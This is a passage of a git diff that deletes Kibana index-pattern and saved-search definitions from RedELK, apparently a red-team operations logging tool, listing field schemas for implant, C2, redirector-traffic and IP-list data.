true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_ext\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_int\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.build\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.codename\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.arch\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.checkin\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.input\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.link_mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.linked\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.output\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.parent_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.sleep\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.task\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ioc.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.thumb\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}}]", "title": "implantsdb"}, "coreMigrationVersion": "7.16.3", "id": "implantsdb", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171862691, 16], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk-iplist.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk-iplist.ndjson deleted file mode 100644 index 26767be9..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk-iplist.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": "redelk-iplist-*"}, "coreMigrationVersion": "7.16.3", "id": "789bb360-2ab1-11eb-bc47-53169c986c81", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171864697, 18], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk.ndjson deleted file mode 100644 index e22f399a..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redelk.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.comments\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"iplist.ip\",\"type\":\"unknown\",\"esTypes\":[\"ip_range\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"iplist.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"module.last_run.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.last_run.timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"module.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "title": "redelk-*"}, "coreMigrationVersion": "7.16.3", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171866710, 20], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redirtraffic.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redirtraffic.ndjson deleted file mode 100644 index fae91607..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_redirtraffic.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fieldAttrs": "{\"tags\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"greynoise.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.first_seen\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.last_result.last_updated\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}},\"greynoise.query_timestamp\":{\"id\":\"string\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"}}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "redirtraffic-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "redirtraffic", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171868723, 243], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_rtops.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_rtops.ndjson deleted file mode 100644 index 7e78ab03..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_rtops.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fieldAttrs": "{\"c2.program\":{\"count\":1}}", "fieldFormatMap": "{\"@timestamp\":{\"id\":\"date\",\"params\":{\"parsedUrl\":{\"basePath\":\"\"},\"pattern\":\"MMM D Y, HH:mm:ss\"}},\"event.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Event URL\"}},\"file.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"/\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"File download\"}},\"implant.log_file\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}},\"keystrokes.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full keystrokes\"}},\"screenshot.full\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Full screenshot\"}},\"screenshot.thumb\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"type\":\"img\",\"urlTemplate\":\"/../..{{rawValue}}\"}},\"implant.url\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"/../..{{rawValue}}\",\"labelTemplate\":\"Implant URL\"}}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "rtops-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "rtops", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171870762, 242], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_search.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_search.ndjson deleted file mode 100644 index 3592c569..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_search.ndjson +++ /dev/null @@ -1,16 +0,0 @@ -{"attributes": {"columns": ["infra.attack_scenario", "agent.hostname", "redir.backend.name", "source.ip", "source.domain", "source.as.organization.name", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Redirector Traffic", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 198], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 201], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "c2.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": 